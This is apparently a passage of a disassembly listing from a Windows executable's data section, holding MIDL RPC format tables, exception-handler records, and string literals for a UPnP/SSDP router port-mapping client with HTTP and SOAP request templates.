dd 48320008h, 0
dd 100015h, 80008h, 3080447h, 1, 0B0000h, 20000h, 40048h
dd 21130008h, 8720008h, 0C0070h, 48320008h, 0
dd 140016h, 240024h, 5080546h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0BA80008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 170000h, 2C001Ch, 7470040h, 10708h, 1, 0Bh, 480002h
dd 80004h, 8011Bh, 480D46h, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
dd 180018h, 840010h, 1080646h, 0
dd 0B0000h, 20000h, 4000Bh, 480002h, 80008h, 0C0048h, 20120008h
dd 0D5A0010h, 140070h, 48320008h, 0
dd 100019h, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 18001Ah, 400024h, 7080647h, 90009h, 0B0000h, 20000h
dd 4011Bh, 480FD0h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 10001Bh, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 0C001Ch, 700000h, 1080346h, 0
dd 0B0000h, 20000h, 42012h, 700FDEh, 80008h, 4832h, 1D0000h
dd 100014h, 5460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 14001Eh, 240008h, 1080546h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0048h
dd 700008h, 80010h
; const unsigned __int8 pFormat
pFormat db 32h ; DATA XREF: sub_9AFF71+8�o
db 48h, 2 dup(0)
dd 1F0000h, 2C0020h, 8470024h, 10308h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80113h, 880FFCh, 1008000Ch
dd 10010Bh, 15800EEh, 80014h, 180048h, 700008h, 8001Ch
; const unsigned __int8 byte_9A52E4
byte_9A52E4 db 32h ; DATA XREF: sub_9AFF93+8�o
db 48h, 2 dup(0)
dd 200000h, 100018h, 6460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 210000h, 100014h, 5460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 1C0022h, 80018h, 3080747h, 1, 0B0000h, 20000h, 4010Bh
dd 11300EEh, 101A0008h, 0C0088h, 481026h, 80010h, 140048h
dd 700008h, 80018h, 4832h, 230000h, 100018h, 6460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 240000h, 240018h, 6470040h
dd 70708h, 7, 0Bh, 11B0002h, 7CC0004h, 80048h, 21500008h
dd 8000Ch, 10001Ah, 7000E8h, 80014h, 4832h, 250000h, 80014h
dd 5460040h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 1100008h, 1034000Ch
dd 100070h, 48000008h, 0
dd 80026h, 0E030h, 380000h, 2440040h, 108h, 0
dd 118h, 70103Ch, 80004h, 4832h, 270000h, 80018h, 6470008h
dd 10308h, 0
dd 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 102013h
dd 701040h, 80014h, 4832h, 280000h, 80018h, 6460008h, 508h
dd 1, 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 10010Bh
dd 700698h, 80014h, 4832h, 290000h, 80010h, 4460008h, 508h
dd 5, 0Bh, 480002h, 80004h, 8010Bh, 70104Ch, 8000Ch, 4832h
dd 2A0000h, 18001Ch, 7460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 8000Bh, 480002h, 8000Ch, 100048h
dd 480008h, 80014h, 180070h, 48320008h, 0
dd 0C002Bh, 240000h, 1080346h, 0
dd 0B0000h, 20000h, 42150h, 700008h, 80008h, 4832h, 2C0000h
dd 4C0020h, 8460008h, 508h, 1, 0Bh, 10B0002h, 0EE0004h
dd 8010Ah, 10B107Eh, 0EE000Ch, 10010Bh, 10B00EEh, 10C80014h
dd 180048h, 700008h, 8001Ch, 4832h, 2D0000h, 440010h, 4460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 2E0000h, 4C0014h, 5460008h, 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 10002Fh, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
dd 1C0030h, 80054h, 3080747h, 1, 0B0000h, 20000h, 4010Ah
dd 10B107Eh, 0EE0008h, 0C0048h, 480008h, 80010h, 140113h
dd 7010E0h, 80018h, 4832h, 310000h, 4C0014h, 5460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 100032h, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
a3_0:
unicode 0, <3(\>
dw 8
dd 5080A46h, 10000h, 0B0000h, 20000h, 4010Bh, 4800EEh
dd 80008h, 0C0048h, 10B0008h, 0EE0010h, 14010Ah, 10B107Eh
dd 0EE0018h, 1C010Bh, 4810C8h, 80020h, 240070h, 48320008h
dd 0
dd 0C0034h, 80000h, 7080347h, 10001h, 0B0000h, 20000h
dd 4201Bh, 7010ECh, 80008h, 4832h, 350000h, 80010h, 4460008h
dd 508h, 5, 0Bh, 480002h, 80004h, 8010Bh, 701124h, 8000Ch
dd 2 dup(0)
db 2 dup(0)
word_9A57C2 dw 0 ; DATA XREF: .text:pStubDescriptor�o
dd 5C250812h, 0CE0011h, 8082Bh, 1FFFCh, 40002h, 2, 0A0000h
dd 1, 52h, 380012h, 40316h, 5C465C4Bh, 0
dd 5C250812h, 5B5C085Bh, 4031Bh, 18h, 5C4B0001h, 44948h
dd 10000h, 0
dd 5C250812h, 0CD004C5Bh, 3165BFFh, 5C4B0008h, 45C46h
dd 120004h, 85BFFD0h, 125B08h, 316004Ch, 5C4B0010h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 31B5B08h
dd 180010h, 10000h, 49485C4Bh, 10h, 2, 8120000h, 85C25h
dd 8120008h, 4C5B5C25h, 5BFFB900h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 29004C08h, 0C115BFFh, 8125C08h, 8115C08h, 4115C25h
dd 82B0002h, 80028h, 20001h, 20004h, 0
dd 1000Ah, 80000h, 120000h, 12FF18h, 11FF62h, 82B0082h
dd 0FFFC0008h, 20001h, 20004h, 0
dd 1FEF8h, 40000h, 120000h, 316004Eh, 5C4B0014h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h
dd 5BFF7500h, 20411h, 28082Bh, 1000Ch, 40002h, 4, 0FF500000h
dd 1, 3EA0010h, 0E0000h, 3EBh, 0FF3Eh, 0FF640012h, 20012h
dd 40315h, 115B08h, 82B0002h, 80028h, 20001h, 40004h, 0
dd 1FF16h, 0FFD60000h, 3EAh, 3EBFFD4h, 0FF040000h, 110000h
dd 82B00ACh, 0FFFC0008h, 20001h, 20004h, 0
dd 1000Ah, 2C0000h, 120000h, 31B0012h, 180004h, 10000h
dd 0FF9E004Ch, 3165B5Ch, 5C4B0008h, 45C46h, 120004h, 85BFFE2h
dd 125B08h, 3160050h, 5C4B001Ch, 145C46h, 8120014h, 5C465C25h
dd 180018h, 5C250812h, 808085Bh, 8080808h, 31B5B5Ch, 18001Ch
dd 10000h, 49485C4Bh, 1Ch, 140002h, 8120014h, 185C25h
dd 8120018h, 4C5B5C25h, 5BFFB500h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 4B004C08h, 115BFFh, 82B0082h, 0FFFC0008h, 20001h, 20004h
dd 2, 3FF4Eh, 40000h, 120000h, 316004Eh, 5C4B0014h, 0C5C46h
dd 812000Ch, 5C465C25h, 100010h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0C000Ch, 5C250812h
dd 100010h, 5C250812h, 0B7004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h, 5BFF7500h
dd 20411h, 28082Bh, 10008h, 40002h, 20002h, 0FE660000h
dd 3, 4, 0FF700012h, 1F80011h, 8082Bh, 1FFFCh, 40002h
dd 5, 0FC8E0000h, 1, 20016h, 740000h, 0Ah, 1F600E6h, 1420000h
dd 120000h, 316004Eh, 5C4B0018h, 5C46h, 8120000h, 5C465C25h
dd 40004h, 5C250812h, 808085Bh, 5B080808h, 18031Bh, 18h
dd 5C4B0001h, 184948h, 20000h, 0
dd 5C250812h, 40004h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 3160062h
dd 5C4B001Ch, 5C46h, 8120000h, 5C465C25h, 40004h, 5C250812h
dd 185C46h, 8120018h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh
dd 18h, 5C4B0001h, 1C4948h, 30000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 0A3004C5Bh
dd 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFC0h, 125B08h
dd 316004Ch, 5C4B0010h, 5C46h, 8120000h, 5C465C25h, 40004h
dd 5C250812h, 808085Bh, 31B5B08h, 180010h, 10000h, 49485C4Bh
dd 10h, 2, 8120000h, 45C25h, 8120004h, 4C5B5C25h, 5BFFB900h
dd 80316h, 5C465C4Bh, 40004h, 0FFC80012h, 5B08085Bh, 740012h
dd 200316h, 5C465C4Bh, 0
dd 5C250812h, 45C46h, 8120004h, 5C465C25h, 180018h, 5C250812h
dd 1C5C46h, 812001Ch, 85B5C25h, 8080808h, 5B080808h, 20031Bh
dd 18h, 5C4B0001h, 204948h, 40000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDFF00h, 20011h
dd 28082Bh, 10004h, 40002h, 9, 0FB700000h, 1, 2002Eh, 4C0000h
dd 1F6h, 3EC0082h, 0FB580000h, 3EEh, 5DDFC1Ch, 0C40000h
dd 3EDh, 1F5FC10h, 0FB440000h, 120000h, 3160002h, 5C4B000Ch
dd 5C46h, 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh
dd 125B5Ch, 3160002h, 5C4B0020h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 808085Bh, 8080808h, 125B08h, 1B000Eh, 180001h
dd 10020h, 3165B02h, 5C4B0028h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 245C46h, 120024h, 85BFFBEh, 2 dup(8080808h)
dd 125B08h, 1B000Eh, 180001h, 10000h, 3165B02h, 5C4B0008h
dd 45C46h, 120004h, 85BFFE6h, 115B08h, 82B011Eh, 0FFFC0008h
dd 20001h, 50004h, 0
dd 1F964h, 160000h, 2, 1F60052h, 9E0000h, 1F5h, 0F99Ah
dd 2C0012h, 0C031Bh, 18h, 5C4B0001h, 0C4948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0CF004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 31B003Ch
dd 180020h, 10000h, 49485C4Bh, 20h, 4, 8120000h, 85C25h
dd 8120008h, 185C25h, 8120018h, 1C5C25h, 812001Ch, 4C5B5C25h
dd 5BFEA100h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h, 5B08085Bh
dd 440012h, 28031Bh, 18h, 5C4B0001h, 284948h, 50000h, 0
dd 5C250812h, 80008h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 240024h, 0FE880012h, 8F004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFB0h, 31A5B08h, 8, 4C080000h
dd 5BFED900h, 20411h, 28082Bh, 10008h, 40002h, 9, 0F9200000h
dd 1, 2FDDEh, 0FDFC0000h, 1F6h, 3ECFE32h, 0F9080000h, 3EEh
dd 5DDF9CCh, 0FE740000h, 3EDh, 1F5F9C0h, 0F8F40000h, 110000h
dd 82B0002h, 80028h, 20001h, 90004h, 0
dd 1F8D6h, 0FD940000h, 2, 1F6FDB2h, 0FDE80000h, 3ECh, 3EEF8BEh
dd 0F9820000h, 5DDh, 3EDFE2Ah, 0F9760000h, 1F5h, 0F8AAh
dd 20411h, 28082Bh, 10004h, 40002h, 64003Bh, 1600000h
dd 65h, 660172h, 1920000h, 192h, 19301C4h, 2080000h, 1F6h
dd 1F70258h, 26E0000h, 257h, 3ED02A8h, 0F85C0000h, 453h
dd 3F2F920h, 0F91A0000h, 3F8h, 3F9F914h, 0F90E0000h, 3FAh
dd 5DDF908h, 0F9020000h, 5DEh, 5DFF8FCh, 0F8F60000h, 5E2h
dd 5E5F8F0h, 0F8EA0000h, 5E6h, 5E7F8E4h, 0F8DE0000h, 5E8h
dd 5E9F8D8h, 0F8D20000h, 5EAh, 5EBF8CCh, 0F8C60000h, 5ECh
dd 5EEF8C0h, 0F8BA0000h, 5F0h, 5F1F8B4h, 0F8AE0000h, 5F2h
dd 5F3F8A8h, 0F8A20000h, 5F4h, 5F5F89Ch, 0F8960000h, 5F8h
dd 5F9F890h, 0F88A0000h, 5FAh, 5FDF884h, 0F87E0000h, 5FEh
dd 5FFF878h, 0F8720000h, 600h, 601F86Ch, 0F8660000h, 602h
dd 603F860h, 0F85A0000h, 604h, 605F854h, 0F84E0000h, 606h
dd 607F848h, 0F8420000h, 608h, 609F83Ch, 0F8360000h, 60Ah
dd 60BF830h, 0F82A0000h, 60Ch, 60DF824h, 0F81E0000h, 60Eh
dd 610F818h, 0F8120000h, 611h, 612F80Ch, 0F8060000h, 613h
dd 614F800h, 0F7FA0000h, 120000h, 3160002h, 5C4B0008h
dd 45C46h, 8120004h, 85B5C25h, 125B08h, 3160002h, 5C4B0018h
dd 45C46h, 8120004h, 5C465C25h, 140014h, 5C250812h, 808085Bh
dd 5B080808h, 20012h, 340316h, 5C465C4Bh, 40004h, 5C250812h
dd 145C46h, 8120014h, 5C465C25h, 300030h, 5C250812h, 808085Bh
dd 2 dup(8080808h), 5B5C0808h, 20012h, 7C0316h, 5C465C4Bh
dd 0C000Ch, 5C250812h, 1C5C46h, 812001Ch, 5C465C25h, 780078h
dd 5C250812h, 808085Bh, 7 dup(8080808h), 125B5Ch, 3160002h
dd 5C4B0088h, 0C5C46h, 812000Ch, 5C465C25h, 1C001Ch, 5C250812h
dd 785C46h, 8120078h, 5C465C25h, 840084h, 5C250812h, 808085Bh
dd 7 dup(8080808h), 5B080808h, 20012h, 480315h, 4 dup(8080808h)
dd 5B5C0808h, 20012h, 0A80316h, 5C465C4Bh, 480048h, 5C250812h
dd 808085Bh, 9 dup(8080808h), 5B080808h, 20012h, 0E00316h
dd 5C465C4Bh, 480048h, 5C250812h, 808085Bh, 0Dh dup(8080808h)
dd 115B08h, 82B0002h, 40028h, 20001h, 3B0004h, 64h, 65FE2Ah
dd 0FE3C0000h, 66h, 192FE5Ch, 0FE8E0000h, 193h, 1F6FED2h
dd 0FF220000h, 1F7h, 257FF38h, 0FF720000h, 3EDh, 453F526h
dd 0F5EA0000h, 3F2h, 3F8F5E4h, 0F5DE0000h, 3F9h, 3FAF5D8h
dd 0F5D20000h, 5DDh, 5DEF5CCh, 0F5C60000h, 5DFh, 5E2F5C0h
dd 0F5BA0000h, 5E5h, 5E6F5B4h, 0F5AE0000h, 5E7h, 5E8F5A8h
dd 0F5A20000h, 5E9h, 5EAF59Ch, 0F5960000h, 5EBh, 5ECF590h
dd 0F58A0000h, 5EEh, 5F0F584h, 0F57E0000h, 5F1h, 5F2F578h
dd 0F5720000h, 5F3h, 5F4F56Ch, 0F5660000h, 5F5h, 5F8F560h
dd 0F55A0000h, 5F9h, 5FAF554h, 0F54E0000h, 5FDh, 5FEF548h
dd 0F5420000h, 5FFh, 600F53Ch, 0F5360000h, 601h, 602F530h
dd 0F52A0000h, 603h, 604F524h, 0F51E0000h, 605h, 606F518h
dd 0F5120000h, 607h, 608F50Ch, 0F5060000h, 609h, 60AF500h
dd 0F4FA0000h, 60Bh, 60CF4F4h, 0F4EE0000h, 60Dh, 60EF4E8h
dd 0F4E20000h, 610h, 611F4DCh, 0F4D60000h, 612h, 613F4D0h
dd 0F4CA0000h, 614h, 0F4C4h, 2A0011h, 35C29h, 6011Ah, 0
dd 0FFF2004Ch, 1215B5Ch, 180000h, 10000h, 18h, 4C0001h
dd 5B5CFFE0h, 80316h, 5C465C4Bh, 40004h, 0FFDC0012h, 5B08085Bh
dd 21411h, 20012h, 440315h, 4 dup(8080808h), 115B08h, 1B000Eh
dd 180001h, 0Ch, 3165B02h, 5C4B0014h, 45C46h, 8120004h
dd 5C465C25h, 80008h, 0FFDC0012h, 105C46h, 8120010h, 85B5C25h
dd 8080808h, 115B5Ch, 82B021Ah, 0FFFC0008h, 20001h, 40004h
dd 0
dd 10016h, 5A0000h, 2, 300DCh, 1600000h, 120000h, 31B0034h
dd 180014h, 10000h, 49485C4Bh, 14h, 40003h, 8120004h, 85C25h
dd 120008h, 10FF76h, 8120010h, 4C5B5C25h, 5BFF7500h, 80316h
dd 5C465C4Bh, 40004h, 0FFC00012h, 5B08085Bh, 720012h, 180316h
dd 5C465C4Bh, 40004h, 5C250812h, 85C46h, 120008h, 5C46FF36h
dd 100010h, 5C250812h, 145C46h, 8120014h, 85B5C25h, 8080808h
dd 31B5B08h, 180018h, 10000h, 49485C4Bh, 18h, 40004h, 8120004h
dd 85C25h, 120008h, 10FEF6h, 8120010h, 145C25h, 8120014h
dd 4C5B5C25h, 5BFF9300h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h
dd 5B08085Bh, 740012h, 1C0316h, 5C465C4Bh, 40004h, 5C250812h
dd 85C46h, 120008h, 5C46FEAEh, 100010h, 5C250812h, 145C46h
dd 8120014h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh, 18h
dd 5C4B0001h, 1C4948h, 40000h, 40004h, 5C250812h, 80008h
dd 0FE6C0012h, 100010h, 5C250812h, 140014h, 5C250812h
dd 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFB8h
dd 125B08h, 1D007Eh, 5B020100h, 1200316h, 5C465C4Bh, 40004h
dd 5C250812h, 85C46h, 120008h, 5C46FE1Eh, 100010h, 5C250812h
dd 145C46h, 8120014h, 85B5C25h, 8080808h, 4C080808h, 5BFFC100h
dd 120031Bh, 18h, 5C4B0001h, 1204948h, 40000h, 40004h
dd 5C250812h, 80008h, 0FDD80012h, 100010h, 5C250812h, 140014h
dd 5C250812h, 8D004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDDD00h, 21411h
dd 20012h, 300315h, 3 dup(8080808h), 115B5Ch, 1B0002h
dd 280001h, 0Ch, 8B75B02h, 0
dd 0FA00h, 5C080811h, 20011h, 2011Bh, 0C0028h, 5B050000h
dd 8B7h, 0FA000000h, 4110000h, 0A0300002h, 4110000h, 0E1300002h
dd 14110000h, 11F646h, 11F652h, 82B0002h, 40028h, 20001h
dd 40120h, 0
dd 1FD2Ah, 0FDCA0000h, 2, 3FE4Ch, 0FED60000h, 110000h
dd 1D0008h, 5B010008h, 100315h, 4C060608h, 5BFFF100h, 3C0011h
dd 140316h, 5C465C4Bh, 100010h, 5C250812h, 0DD004C5Bh
dd 5B5C08FFh, 14031Bh, 18h, 5C4B0001h, 144948h, 10000h
dd 100010h, 5C250812h, 0C9004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFD0h, 115B08h, 11B0002h, 280002h
dd 10010h, 14125B05h, 120002h, 31B0012h, 80008h, 1FFFCh
dd 0F8E8004Ch, 3185B5Ch, 0FFEC0004h, 49485C4Bh, 40008h
dd 80001h, 8120008h, 85B5C25h, 115B5Ch, 82B0002h, 40028h
dd 20001h, 40120h, 0
dd 1FC52h, 0FCF20000h, 2, 3FD74h, 0FDFE0000h, 0
dd 3C0000h, 0A20072h, 12000E4h, 186015Ch, 1F801B6h, 2760240h
dd 2E802A0h, 34E0318h, 3C0038Ah, 42C03FCh, 48C045Ch, 4F204BCh
dd 5700534h, 5DC05A0h, 636060Ch, 6A2066Ch, 72606EAh, 79E075Ch
dd 81607DAh, 876084Ch, 8EE08B2h, 960091Eh, 9D2098Ah, 0A380A02h
dd 0AAA0A68h, 0B100AE0h, 0B8E0B64h, 0
; const MIDL_STUB_DESC pStubDescriptor
pStubDescriptor MIDL_STUB_DESC <offset dword_9A4BB0, offset sub_9AA62A, \
; DATA XREF: sub_9AFF71+D�o
; sub_9AFF93+D�o
offset loc_9AA638, <offset Binding>, 0, 0, 0, 0, \
offset word_9A57C2, 1, 50002h, 0, 600016Eh, 0, 0, 0, \
1, 0, 0, 0>
byte_9A69D0 db 0 ; DATA XREF: sub_9B0191+44�r
byte_9A69D1 db 10h ; DATA XREF: sub_9B0191+4C�r
word_9A69D2 dw 1 ; DATA XREF: sub_9B0191+54�r
dd 4161111h, 8041212h, 41613h, 51717h, 61818h, 131C19h
dd 0B1D1Dh, 0C391Eh, 73E3Ah, 8403Fh, 0E4141h, 0D4545h
dd 104442h, 114646h, 124847h, 144B49h, 154C4Ch, 16524Dh
dd 195C53h, 0A6F5Dh, 1D7170h, 1F7272h
; char SubBlock[]
SubBlock db '\VarFileInfo\Translation',0 ; DATA XREF: sub_9AFFB5+95�o
align 4
stru_9A6A48 _msEH <0FFFFFFFFh, offset loc_9B0084, offset loc_9B0088>
; DATA XREF: sub_9AFFB5+5�o
align 8
stru_9A6A58 _msEH <0FFFFFFFFh, offset loc_9B0201, offset loc_9B0205>
; DATA XREF: sub_9B0191+2�o
dword_9A6A64 dd 0C516C213h, 6CA09CABh, 0EF0865D8h, 2 dup(0) ; DATA XREF: sub_9B0216+42�o
stru_9A6A78 _msEH <0FFFFFFFFh, offset loc_9B02E4, offset loc_9B02E8>
; DATA XREF: sub_9B0216+2�o
align 8
stru_9A6A88 _msEH <0FFFFFFFFh, offset loc_9B03BF, offset loc_9B03C3>
; DATA XREF: sub_9B02F5+5�o
dd 2 dup(0Ch), 2 dup(7), 0Eh, 80h, 4000h, 7Ch, 1000000h
dd 8000h
dword_9A6ABC dd 1F3F3CDDh, 48F359BFh, 5ABC64A1h, 60516632h ; DATA XREF: sub_9B2A03+ED�o
byte_9A6ACC db 19h ; DATA XREF: sub_9B2A03+11D�o
; sub_9B3378+FE�r
db 0Eh, 9, 7
dd 4040505h, 3030304h, 2020202h
; char aGetSHttp1_1Hos[]
aGetSHttp1_1Hos db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B5139+D1�o
db 'Host: %s:%d',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 0Dh,0Ah,0
; char asc_9A6B10[]
asc_9A6B10 db '://',0 ; DATA XREF: sub_9B5345+9�o
aService db 'service',0 ; DATA XREF: sub_9B575F+2A�o
; sub_9B57BA+18�o
; char aUrnSchemasUp_2[]
aUrnSchemasUp_2 db 'urn:schemas-upnp-org:service:WANPPPConnection:1',0
; DATA XREF: .text:009A6D24�o
; sub_9B57BA+A4�o
; char aUrnSchemasUp_1[]
aUrnSchemasUp_1 db 'urn:schemas-upnp-org:service:WANIPConnection:1',0
; DATA XREF: .text:009A6D20�o
; sub_9B57BA:loc_9B584D�o
align 4
; char aUrnSchemasUpnp[]
aUrnSchemasUpnp db 'urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1',0
; DATA XREF: sub_9B57BA+39�o
; sub_9B5DA4+77�o
; char aScpdurl[]
aScpdurl db 'SCPDURL',0 ; DATA XREF: sub_9B58C5:loc_9B592E�o
; char aEventsuburl[]
aEventsuburl db 'eventSubURL',0 ; DATA XREF: sub_9B58C5:loc_9B5915�o
; char aControlurl[]
aControlurl db 'controlURL',0 ; DATA XREF: sub_9B58C5:loc_9B58FC�o
align 4
; char aServicetype[]
aServicetype db 'serviceType',0 ; DATA XREF: sub_9B58C5:loc_9B58E3�o
; char aUrlbase[]
aUrlbase db 'URLBase',0 ; DATA XREF: sub_9B58C5+5�o
; char aPostSHttp1_1Ho[]
aPostSHttp1_1Ho db 'POST %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B596E+51�o
db 'Host: %s%s',0Dh,0Ah
db 'User-Agent: POSIX, UPnP/1.0',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'SOAPAction: "%s"',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 'Cache-Control: no-cache',0Dh,0Ah
db 'Pragma: no-cache',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aHu[]
aHu db ':%hu',0 ; DATA XREF: sub_9B596E+2D�o
align 10h
aContentLength db 'content-length',0 ; DATA XREF: sub_9B5A5F+5�o
align 10h
; char aMSearchHttp1_1[]
aMSearchHttp1_1 db 'M-SEARCH * HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B611D+103�o
db 'HOST: 239.255.255.250:1900',0Dh,0Ah
db 'ST: %s',0Dh,0Ah
db 'MAN: "ssdp:discover"',0Dh,0Ah
db 'MX: 3',0Dh,0Ah
db 0Dh,0Ah,0
align 4
off_9A6D1C dd offset aUrnSchemasUp_0 ; DATA XREF: sub_9B611D+E8�o
; "urn:schemas-upnp-org:device:InternetGat"...
dd offset aUrnSchemasUp_1 ; "urn:schemas-upnp-org:service:WANIPConne"...
dd offset aUrnSchemasUp_2 ; "urn:schemas-upnp-org:service:WANPPPConn"...
dd offset aUpnpRootdevice ; "upnp:rootdevice"
align 10h
aUpnpRootdevice db 'upnp:rootdevice',0 ; DATA XREF: .text:009A6D28�o
aUrnSchemasUp_0 db 'urn:schemas-upnp-org:device:InternetGatewayDevice:1',0
; DATA XREF: .text:off_9A6D1C�o
aSt db 'st',0 ; DATA XREF: sub_9B5AC7+6C�o
align 4
aLocation db 'location',0 ; DATA XREF: sub_9B5AC7+47�o
align 4
; char aConnected[]
aConnected db 'Connected',0 ; DATA XREF: sub_9B5D65+2B�o
align 10h
; char aSBodySEnvelope[]
aSBodySEnvelope db '></s:Body></s:Envelope>',0Dh,0Ah,0 ; DATA XREF: sub_9B5E93+102�o
align 10h
; char a?xmlVersion1_1[]
a?xmlVersion1_1 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_9B5E93+5E�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s">',0
align 10h
; char a?xmlVersion1_0[]
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_9B5E93+45�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s"></m:%s></s:Body></s:Envelope>',0Dh,0Ah,0
align 10h
; char aSS[]
aSS db '%s#%s',0 ; DATA XREF: sub_9B5E93+23�o
align 4
; char cp[]
cp db '239.255.255.250',0 ; DATA XREF: sub_9B611D+7F�o
; char aErrorcode[]
aErrorcode db 'errorCode',0 ; DATA XREF: sub_9B644D+105�o
; sub_9B658C+99�o ...
align 4
; char aNewlastconnect[]
aNewlastconnect db 'NewLastConnectionError',0 ; DATA XREF: sub_9B644D+86�o
align 4
; char aNewconnections[]
aNewconnections db 'NewConnectionStatus',0 ; DATA XREF: sub_9B644D+75�o
; char aNewuptime[]
aNewuptime db 'NewUptime',0 ; DATA XREF: sub_9B644D+64�o
align 4
aGetstatusinfo db 'GetStatusInfo',0 ; DATA XREF: sub_9B644D+3C�o
align 4
; char aNewexternalipa[]
aNewexternalipa db 'NewExternalIPAddress',0 ; DATA XREF: sub_9B658C+6D�o
align 4
aGetexternalipa db 'GetExternalIPAddress',0 ; DATA XREF: sub_9B658C+45�o
align 4
; char aNewleasedurati[]
aNewleasedurati db 'NewLeaseDuration',0 ; DATA XREF: sub_9B6663+BB�o
; sub_9B686F+196�o
align 10h
aAddportmapping db 'AddPortMapping',0 ; DATA XREF: sub_9B6663+B3�o
align 10h
; char aNewportmapping[]
aNewportmapping db 'NewPortMappingDescription',0 ; DATA XREF: sub_9B6663+96�o
; sub_9B686F+16F�o
align 4
; char aNewenabled[]
aNewenabled db 'NewEnabled',0 ; DATA XREF: sub_9B6663+88�o
; sub_9B686F+148�o
align 4
; char aNewinternalcli[]
